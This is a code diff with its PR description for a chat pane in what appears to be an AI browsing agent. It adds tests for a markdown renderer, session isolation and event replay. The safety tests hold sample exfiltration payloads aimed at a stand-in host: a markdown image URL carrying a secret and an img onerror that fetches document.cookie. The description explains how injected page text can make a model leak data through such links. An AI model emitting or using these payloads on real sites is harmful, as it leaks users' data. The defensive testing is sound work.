+    got = [node] if node["tag"] == tag else []
+    for k in node["kids"]:
+        got += find(k, tag)
+    return got
+
+
+def text_of(node) -> str:
+    if node["tag"] == "#text" or node.get("text") is not None:
+        return node["text"] or ""
+    return "".join(text_of(k) for k in node["kids"])
+
+
+pytestmark = pytest.mark.skipif(
+    not NODE,
+    reason="needs node to EXECUTE the page's renderer; without it this whole "
+           "file is silent and the only cover left is a string scan")
+
+
+def test_a_heading_becomes_a_heading_and_not_two_hashes():
+    """The defect that started this: the pane drew the marks.
+
+    Known-bad: delete the HEAD branch from `blocks`.
+    """
+    got = draw("## Roles")["tree"]
+    heads = find(got, "h4")
+    assert heads, "no heading element: %s" % tags(got)
+    assert text_of(heads[0]) == "Roles"
+    assert "#" not in text_of(got), "the hashes were drawn as characters"
+
+
+def test_the_answer_never_outranks_the_page_it_is_drawn_in():
+    """`#` lands on h3 because the interface's own title sits above this pane.
+
+    Known-bad: `head[1].length` instead of `+ 2`, which puts an answer at h1.
+    """
+    assert find(draw("# Title")["tree"], "h3"), "a top heading must not be h1 or h2"
+    assert find(draw("###### deep")["tree"], "h6")
+    assert find(draw("####### deeper than markdown goes")["tree"], "h6") == [], (
+        "seven hashes is not a heading in any markdown, and drawing one would "
+        "invent a level the language does not have")
+
+
+def test_a_dash_list_becomes_a_list():
+    """Known-bad: drop the BULLET branch. Every bullet is then a paragraph and
+    the dashes are drawn.
+    """
+    got = draw("- one\n- two\n- three")["tree"]
+    items = find(got, "li")
+    assert [text_of(i) for i in items] == ["one", "two", "three"]
+    assert find(got, "ul"), "the items are not in a list"
+    assert "- " not in text_of(got)
+
+
+def test_a_numbered_list_keeps_its_numbers_from_the_browser():
+    """⛔ AND NOT AS TEXT. An `ol` numbers itself, so a list that renumbers when
+    the model miscounts is the correct one - and a list whose numbers are
+    characters would show `1. 1. 1.` the day a model writes them all as one.
+
+    Known-bad: build `ul` for both kinds; then the numbers vanish entirely,
+    which is worse than drawing them.
+    """
+    got = draw("1. first\n2. second")["tree"]
+    assert find(got, "ol"), "a numbered list must be an ol: %s" % tags(got)
+    assert [text_of(i) for i in find(got, "li")] == ["first", "second"]
+
+
+def test_the_two_kinds_of_list_do_not_merge():
+    """A bulleted list followed by a numbered one is two lists.
+
+    Known-bad: drop the `!== ordered` break; the numbered items then join the
+    bulleted list and lose their numbering.
+    """
+    got = draw("- a\n1. b")["tree"]
+    assert len(find(got, "ul")) == 1 and len(find(got, "ol")) == 1
+
+
+def test_an_indented_list_nests_inside_its_item():
+    """Known-bad: remove the `mark[1].length > base` branch. The nested items
+    flatten into the parent list and the structure the model wrote is lost.
+    """
+    got = draw("- fruit\n  - apple\n  - pear\n- bread")["tree"]
+    outer = find(got, "ul")[0]
+    assert len(outer["kids"]) == 2, "the nested items were flattened into the parent"
+    inner = find(outer["kids"][0], "ul")
+    assert len(inner) == 1, "the nested list is not inside the item it belongs to"
+    # The inner list's OWN items: `find` from the item would also return the
+    # item, whose text contains everything below it.
+    assert [text_of(i) for i in inner[0]["kids"]] == ["apple", "pear"]
+    assert text_of(outer["kids"][1]) == "bread", "the outer list did not resume"
+
+
+def test_a_table_becomes_a_table():
+    """A model listing anything writes pipes, and pipe soup is the ugliest way
+    this pane could fail.
+
+    Known-bad: drop the DASHES condition; the header row is then a paragraph
+    full of pipes and the rows never become cells.
+    """
+    got = draw("| Role | City |\n|---|---|\n| Engineer | Milan |\n| Analyst | Rome |")["tree"]
+    assert find(got, "table"), "no table: %s" % tags(got)
+    assert [text_of(h) for h in find(got, "th")] == ["Role", "City"]
+    assert [text_of(d) for d in find(got, "td")] == ["Engineer", "Milan", "Analyst", "Rome"]
+    assert "|" not in text_of(got)
+
+
+def test_a_line_of_pipes_that_is_not_a_table_stays_a_sentence():
+    """⛔ THE CASE THAT MUST NOT FIRE. A pipe is an ordinary character - a shell
+    command, an or - and a gate that turned every line containing one into a
+    table would be worse than the defect it fixes.
+    """
+    got = draw("Run `ls | wc -l` to count them.")["tree"]
+    assert not find(got, "table")
+    assert "|" in text_of(got)
+
+
+def test_a_rule_is_a_rule_and_a_bullet_is_not():
+    """`---` and `- item` start with the same character.
+
+    Known-bad: loosen RULE from three marks to two. ⛔ THE FIRST VERSION OF THIS
+    TEST SURVIVED THAT, because the case it offered was `a -- b`, which no
+    version of the rule matches - it does not begin with the mark. The mutation
+    was reaching the code and the gate was not blind: the CASE was exercising a
+    different branch from the one it named. So the line below is the one the
+    change actually moves, a line that is nothing but two dashes.
+    """
+    assert find(draw("---")["tree"], "hr")
+    assert find(draw("***")["tree"], "hr")
+    assert find(draw("- - -")["tree"], "hr")
+    assert not find(draw("- item")["tree"], "hr"), "a bullet was drawn as a rule"
+    assert not find(draw("a -- b")["tree"], "hr")
+    assert not find(draw("--")["tree"], "hr"), (
+        "two marks are not a rule in any markdown, and a line of two dashes is "
+        "ordinary prose - a signature separator, a bare flag")
+
+
+def test_a_quote_holds_blocks_and_not_just_letters():
+    """Known-bad: `inline` instead of `blocks` inside the quote. A quoted list
+    is then a quote with dashes in it.
+    """
+    got = draw("> Note this\n> - and this")["tree"]
+    quote = find(got, "blockquote")
+    assert quote, "no blockquote: %s" % tags(got)
+    assert find(quote[0], "li"), "the list inside the quote stayed characters"
+    assert ">" not in text_of(got)
+
+
+def test_the_three_inline_marks_still_work():
+    """They were the only ones that worked, and a block parser written over them
+    is exactly the change that could take them away.
+    """
+    got = draw("A **bold** and *soft* and `typed` line")["tree"]
+    assert text_of(find(got, "strong")[0]) == "bold"
+    assert text_of(find(got, "em")[0]) == "soft"
+    assert text_of(find(got, "code")[0]) == "typed"
+    assert "*" not in text_of(got) and "`" not in text_of(got)
+
+
+def test_a_fence_is_still_code_and_its_language_is_not_drawn():
+    got = draw("before\n```python\nprint(1)\n```\nafter")["tree"]
+    pre = find(got, "pre")
+    assert pre and text_of(pre[0]).strip() == "print(1)", [text_of(p) for p in pre]
+    assert "python" not in text_of(got)
+
+
+def test_a_fence_that_never_closed_is_still_shown_as_code():
+    """A half-written answer must not change shape when the closing fence
+    arrives."""
+    assert find(draw("here it comes\n```\nprint(1)")["tree"], "pre")
+
+
+def test_marks_inside_a_block_are_read():
+    """Known-bad: append the raw text to the item instead of calling `inline`."""
+    got = draw("- a **bold** item\n- a `typed` one")["tree"]
+    assert find(got, "strong") and find(got, "code")
+    got = draw("## A **bold** heading")["tree"]
+    assert find(got, "strong"), "the marks inside a heading were drawn as text"
+
+
+def test_prose_is_left_alone():
+    """⛔ THE CASE THAT MUST NOT FIRE, and the one a block parser gets wrong.
+    Most of what this pane draws is a plain sentence."""
+    got = draw("I am on example.com and the title is Example Domain.")["tree"]
+    assert [k["tag"] for k in got["kids"]] == ["p"]
+    assert text_of(got) == "I am on example.com and the title is Example Domain."
+
+
+def test_a_blank_line_is_not_drawn_twice():
+    """⛔ THE PRE-WRAP WAS ON THE CONTAINER, so the blank line the model leaves
+    between two paragraphs used to be a drawn empty line. Now the parser eats it
+    and the margin does the spacing - if the parser stopped eating it, every
+    answer would be double spaced and nothing would fail.
+
+    Known-bad: keep the blank lines in the paragraph text.
+    """
+    got = draw("one\n\ntwo")["tree"]
+    assert [k["tag"] for k in got["kids"]] == ["p", "p"]
+    assert text_of(got["kids"][0]) == "one" and text_of(got["kids"][1]) == "two"
+
+
+def test_a_single_newline_still_breaks_the_line_where_the_model_put_it():
+    """The other half of the same decision: inside a paragraph the break is the
+    author's, and it survives as a newline for `white-space:pre-wrap` to draw.
+    """
+    assert text_of(draw("one\ntwo")["tree"]) == "one\ntwo"
+
+
+# ---------------------------------------------------------------- the safety half
+
+def test_the_pane_never_builds_an_image_or_a_link_element():
+    """⛔ THE EXFILTRATION VECTOR, ASSERTED ON THE TAG AND NOT ON THE INTENT.
+    An `<img>` fetches its source the instant it enters the document, so a
+    model repeating `![](https://attacker/log?d=...)` from a page it just read
+    would send that query with nobody clicking anything.
+
+    Known-bad: render the image branch as `el('img')` with the url - which is
+    exactly what every markdown library does, and what every product in the
+    incident table did before it leaked.
+    """
+    got = draw("![](https://attacker.test/log?d=SECRET)\n\n"
+               "[click me](https://attacker.test/go)")
+    assert "img" not in got["made"], "the pane created an image element"
+    assert "a" not in got["made"], "the pane created a link element"
+    assert "iframe" not in got["made"] and "script" not in got["made"]
+
+
+def test_an_injected_address_is_printed_where_a_person_can_see_it():
+    """Hiding the destination behind words is the other half of the same
+    problem: the address is what tells a person the answer has been got at.
+    """
+    got = draw("[the careers page](https://attacker.test/log?d=SECRET)")["tree"]
+    assert "https://attacker.test/log?d=SECRET" in text_of(got)
+    assert "the careers page" in text_of(got)
+    assert "](" not in text_of(got), "the mark itself was drawn"
+
+
+def test_html_in_the_answer_stays_letters():
+    """It never stops being a text node, so it is drawn as the characters of a
+    tag rather than becoming one.
+
+    Known-bad: any innerHTML on the way in - the shim throws by name.
+    """
+    hostile = '<img src=x onerror="fetch(\'//attacker.test/\'+document.cookie)">'
+    got = draw(hostile)
+    assert "img" not in got["made"]
+    assert text_of(got["tree"]) == hostile, "the answer was parsed instead of drawn"
+
+
+def test_a_table_cell_cannot_smuggle_a_tag_either():
+    """The cells go through the same `inline`, and a renderer that special-cased
+    them would be the one place the invariant did not hold."""
+    got = draw("| a | b |\n|---|---|\n| <script>x</script> | ok |")
+    assert "script" not in got["made"]
+    assert "<script>x</script>" in text_of(got["tree"])
+
+
+def test_the_page_holds_no_innerhtml_at_all():
+    """The gate above covers the renderer, which is where untrusted text goes.
+    This one covers the file, because the next person to add a pane will copy
+    whatever is nearest.
+
+    ⛔ AND IT READS THE CODE, NOT THE COMMENTS BESIDE IT. Its first version was
+    red on a correct file: the two places this page mentions `innerHTML` are
+    comments explaining why it is never used, and a scan that cannot tell code
+    from prose is a gate that goes red for the reason opposite to the one it was
+    written for. This project has that failure written down in both directions.
+
+    Known-bad: `e.innerHTML = x` in `el`, which the shim above also refuses.
+    """
+    import re
+
+    script = PAGE[PAGE.index("<script"):]
+    code = re.sub(r"/\*.*?\*/", "", script, flags=re.S)
+    code = re.sub(r"(?m)^\s*//.*$", "", code)
+    for name in ("innerHTML", "outerHTML", "insertAdjacentHTML", "document.write"):
+        assert name not in code, (
+            "the page uses %s, which parses text into markup: the answer pane "
+            "draws words chosen by whatever page the agent last read" % name)
+
+
+def test_the_whole_script_parses():
+    """⛔ THREE TIMES IN THREE DAYS THIS PAGE SHIPPED DEAD, and every time the
+    suite was green: a duplicate `let`, a top-level read before its declaration,
+    a function removed from under a handler. Two of those are syntax, and a hand
+    written scan for them is a guess at what a parser does.
+
+    node is here, so this asks the real parser. It does not replace the two
+    scans next door - a dead-zone read is a runtime error and parses fine - but
+    it is the one that cannot be fooled by a shape nobody predicted.
+
+    Known-bad: add `let turn = 0;` at the top level a second time.
+    """
+    script = PAGE[PAGE.index("<script"):]
+    script = script[script.index(">") + 1:script.index("</script>")]
+    # ⛔ utf-8 SPELLED OUT: the page's comments are not ASCII, and on Windows a
+    # pipe opened with the console codepage dies on the first one - which reads
+    # as the script being unparseable rather than as the harness being unable to
+    # send it.
+    done = subprocess.run([NODE, "--check"], input=script, capture_output=True,
+                          text=True, encoding="utf-8")
+    assert done.returncode == 0, (
+        "the page's script does not parse, so a browser runs NONE of it and the "
+        "page renders dead:\n%s" % done.stderr)

--- a/tests/test_the_suite_reads_no_real_session.py
+++ b/tests/test_the_suite_reads_no_real_session.py
@@ -72,3 +72,35 @@ def test_the_server_starts_each_test_holding_nothing():
     for held in ("_focus", "_loaded", "_seen_tabs", "_tabs_owed"):
         assert not getattr(server, held), (
             "server.%s arrived at this test with %r in it" % (held, getattr(server, held)))
+
+
+def test_the_conftest_imports_nothing_the_light_jobs_do_not_have():
+    """⛔ AN AUTOUSE FIXTURE RUNS FOR EVERY TEST IN THE REPOSITORY, so anything
+    it imports becomes a dependency of every test - including the ones in jobs
+    that deliberately install almost nothing.
+
+    Measured on 2026-09-08: the fixture next door imported `aihawk.mcp.server`
+    to clear four dicts, and the `version` and `releases` jobs, which run
+    `pip install pytest` and nothing else because what they check is a version
+    number and a set of release pages, both went red with `ModuleNotFoundError:
+    No module named 'mcp'` at fixture setup - on tests that have no business
+    knowing the server exists. Six matrix jobs were green at the same time.
+
+    The state can only be dirty if something imported the module, so
+    `sys.modules.get` answers the question without creating the dependency.
+
+    Known-bad: put `from aihawk.mcp import server` back in the fixture. Costs a
+    CI round trip to find out otherwise.
+    """
+    import pathlib
+    import re
+
+    source = (pathlib.Path(__file__).parent / "conftest.py").read_text(encoding="utf-8")
+    code = re.sub(r'"""(?:.|\n)*?"""', "", source)
+    reached = re.findall(r"^\s*(?:from|import)\s+([A-Za-z_][\w.]*)", code, re.M)
+    allowed = {"__future__", "os", "sys", "tempfile", "pytest", "pathlib"}
+    assert set(reached) <= allowed, (
+        "conftest.py imports %s, and every test in the repository then needs "
+        "it: the two jobs that install pytest alone would fail at fixture "
+        "setup, on tests that never touch it"
+        % sorted(set(reached) - allowed))

--- a/tests/test_the_suite_reads_no_real_session.py
+++ b/tests/test_the_suite_reads_no_real_session.py
@@ -1,0 +1,74 @@
+"""The suite must not be able to see the session the person using AIHawk has.
+
+⛔ A VERDICT THAT DEPENDS ON WHAT THE DEVELOPER LEFT OPEN IS NOT A VERDICT.
+`tests/conftest.py` has pointed `AIHAWK_HOME` at a temporary directory since
+sessions became persistent, and that covered every test BODY - but a fixture
+runs when a test runs, and a module-level line runs when the file is IMPORTED,
+which is earlier. One test module asks the server a question at import time,
+that question reads the saved session, and so collection alone loaded the real
+one: measured on the developer's machine, two tests in `test_addressing.py`
+were red because the live session had its focus on a browser named after a job
+search, and eight real URLs were carried into every test that followed. In
+isolation they passed. On CI they passed, because CI has nothing saved to read.
+
+This file is the gate for that, and it is deliberately not a scan for
+module-level calls: it measures the property those calls depend on, which is
+the same on every machine.
+
+Known-bad: delete the `os.environ["AIHAWK_HOME"] = ...` line at the top of
+`tests/conftest.py`. AT_IMPORT below then resolves to the platform's real
+directory - `%APPDATA%/aihawk`, `~/.local/share/aihawk` - and the first
+assertion goes red whether or not that directory happens to hold anything
+today.
+"""
+from __future__ import annotations
+
+import os
+
+from aihawk.mcp import store
+
+#: What a line running at import time sees. Captured HERE, at module level, on
+#: purpose: read inside a test it would show the per-test directory and prove
+#: nothing about the moment the defect lives in.
+AT_IMPORT = store.home()
+
+
+def _the_real_one():
+    """Where sessions would be kept with nothing redirecting them."""
+    keep = os.environ.pop("AIHAWK_HOME", None)
+    try:
+        return store.home()
+    finally:
+        if keep is not None:
+            os.environ["AIHAWK_HOME"] = keep
+
+
+def test_importing_a_test_module_cannot_reach_the_real_directory():
+    real = _the_real_one()
+    assert AT_IMPORT != real, (
+        "at import time the tests read %s, which is where the person using "
+        "AIHawk keeps their sessions: collecting the suite loads whatever they "
+        "left open, and the run reports on that as much as on the product" % real)
+
+
+def test_and_neither_can_a_test_body():
+    """The fixture's half of the same promise, and the older one."""
+    real = _the_real_one()
+    assert store.home() != real
+    assert os.environ.get("AIHAWK_HOME"), "the redirection is not in place"
+
+
+def test_the_server_starts_each_test_holding_nothing():
+    """The state the server keeps between calls is emptied per test, so what one
+    test leaves behind is not an input to the next.
+
+    Known-bad: drop the second autouse fixture from `conftest.py`. This stays
+    green on its own - the poison needs another test to run first - so it is
+    written as the contract rather than as a reproduction: these four are empty
+    when a test begins, and any test may rely on that.
+    """
+    from aihawk.mcp import server
+
+    for held in ("_focus", "_loaded", "_seen_tabs", "_tabs_owed"):
+        assert not getattr(server, held), (
+            "server.%s arrived at this test with %r in it" % (held, getattr(server, held)))

--- a/tests/test_web_service.py
+++ b/tests/test_web_service.py
@@ -172,13 +172,21 @@ async def test_an_event_after_subscription_is_delivered_once_as_live():
         return json.loads(line.removeprefix(b"data: ").strip())
 
     assert payload(await anext(body))["kind"] == "model"
-    delivered = [payload(await anext(body))]
-    try:
-        delivered.append(payload(await asyncio.wait_for(anext(body), 0.1)))
-    except asyncio.TimeoutError:
-        pass
+    # ⛔ THREE, AND FILTERED BY KIND. This used to read exactly two events and
+    # compare the whole list, so it went red the day the stream gained a state
+    # event it says nothing about - and had it kept reading two while gaining
+    # one, a DUPLICATE would have arrived third and gone unseen, which is the
+    # only thing this test exists to catch. It is about how many times `said` is
+    # delivered, so it counts those and ignores the rest.
+    delivered = []
+    for _ in range(3):
+        try:
+            delivered.append(payload(await asyncio.wait_for(anext(body), 0.1)))
+        except asyncio.TimeoutError:
+            break
 
-    assert delivered == [{"kind": "said", "text": "only once"}]
+    assert [e for e in delivered if e["kind"] == "said"] == [
+        {"kind": "said", "text": "only once"}], delivered
 
 
 # --------------------------------------------------------------------------
@@ -720,21 +728,52 @@ async def test_a_page_that_joins_a_run_in_flight_is_told_the_run_is_in_flight():
     svc.stop()
 
 
-async def test_a_page_that_joins_an_idle_service_is_not_told_anything_about_busy():
-    """The other side, and the reason the event is conditional: a page starts
-    out believing it is idle, so saying so again is noise, and the page's own
-    handler treats `busy 0` as the end of a turn it never saw begin.
+async def test_a_page_that_joins_an_idle_service_is_told_the_turn_is_over():
+    """⛔ THIS TEST ASSERTED THE OPPOSITE UNTIL 2026-09-08, AND THE OPPOSITE COST
+    THE LAST ANSWER OF EVERY CONVERSATION SOMEBODY REOPENED.
 
-    Known-bad: sending the state unconditionally.
+    It read: a page starts out believing it is idle, so saying so again is
+    noise, and the page's own handler treats `busy 0` as the end of a turn it
+    never saw begin. Both halves are true and the conclusion was still wrong,
+    because after a REPLAY the turn being ended is one that really did end. The
+    page holds one narration line back so that a sentence followed by tool calls
+    reads as their lead-in and a sentence with nothing after it reads as the
+    answer, and the only event that resolves that lookahead is the end of the
+    turn. `emit` keeps `busy` out of the history on purpose, so a reopened
+    conversation replayed everything and then sat holding its last sentence,
+    forever, with nothing else coming.
+
+    Measured on the developer's own saved session: 257 events ending in `said`,
+    and the answer to the last thing they asked was not on the screen. Nothing
+    was red. The suite tests the routes and reads the page as a string, and the
+    page is correct here - it is the stream that never said the turn was over.
+
+    Known-bad: make the event conditional on `joining_a_run` again. The last
+    event below stops being a `busy`, and a person reopening a conversation
+    loses its answer.
     """
     svc = ChatService(FakeLink(), SilentBrain())
+    svc.history = [{"kind": "you", "text": "what is on the page"},
+                   {"kind": "said", "text": "Three roles, all remote."}]
     app = build_app(FakeLink(), Sessions.around(svc))
     events = [r for r in app.routes if r.path == "/chat/events"][0]
 
     resp = await events.endpoint(_Req())
     seen = await _first_events(resp)
 
-    assert [e for e in seen if e["kind"] == "busy"] == []
+    busy = [e for e in seen if e["kind"] == "busy"]
+    assert busy, (
+        "a page reopening a finished conversation was never told the turn "
+        "ended, so the last thing the model said stays held and is never "
+        "drawn: %r" % seen)
+    assert busy[0]["text"] == "0"
+    assert busy[0].get("replay"), (
+        "the end of a turn that finished before this listener existed must be "
+        "flagged as replay, or the page animates a row and redraws the session "
+        "list for a turn nobody watched")
+    said = [i for i, e in enumerate(seen) if e["kind"] == "said"]
+    assert said and seen.index(busy[0]) > said[-1], (
+        "the turn was declared over before the sentence it ends was replayed")
 
 
 # --------------------------------------------------------------------------


### PR DESCRIPTION
The pane understood three inline marks and nothing else, so a model answering in headings and lists - which is how a model answers - had `## Roles` drawn on screen as a hash, a hash and a space. Measured by executing the renderer against a real answer: only `**bold**`, `*soft*`, `` `code` `` and fenced blocks survived. Headings, both kinds of list, quotes, tables, rules and links came out as their own characters.

The marks become elements now, built by hand the way the three that worked already were. Never innerHTML: this pane draws words chosen by whoever wrote the last page the agent visited, so `![](https://attacker/log?d=SECRET)` would fetch itself the instant it entered the document, with no click and no script. Images are not implemented at all, and a link is shown without being clickable with its address printed next to the words rather than hidden behind them.

And the last thing the model said was never drawn. The page holds one narration line back so that a sentence with tool calls after it reads as their lead-in and one with nothing after it reads as the answer; the only event that resolves that is the end of the turn, which a replay does not carry. A reopened conversation sat holding its last sentence forever. Measured on a real saved session: 257 events ending in `said`, and the answer to the last question was not on the screen.

The rest came from looking at a real conversation rather than at the code. Ticks and crosses in front of most lines: the model writes those because nothing told it not to, so the sentence goes in the prompt - and since a saved transcript carries the instructions of the day it started, restoring one put the old prompt back and every change reached new conversations only. Blocks stuck together: 4px between list items under a 22px line, so a wrapped item ran into the next. A column sitting away from the edge with the space split in two, and a measure cap that was measuring the wrong thing - an answer carries an indent of its own, so 72ch was giving 67 characters of prose, under the range its own comment cites rather than over it.

## Gates

Three new, and every known-bad they claim was run: 16 mutations, 16 killed.

* **the renderer is executed.** Every other test of this page reads it as a string, which cannot say what a renderer makes. The region between two markers is cut out and run against a DOM small enough to print. The same harness asserts the safety half by force: assigning innerHTML throws, and every tag created is recorded so `img` and `a` are absent rather than hoped absent.
* **`node --check` on the whole script.** This page has shipped dead three times in three days with the suite green, and two of those were syntax. A hand written scan for a syntax error is a guess at what a parser does, and the parser was already installed.
* **the suite cannot read the real machine's sessions.** One test module asked the server a question at import time, before any fixture, so collecting the suite loaded whatever the developer had left open: two tests were red because a live session had its focus on another browser, and eight real URLs were carried into every test that followed. Green in isolation, green on CI, red in the suite.

468 tests green.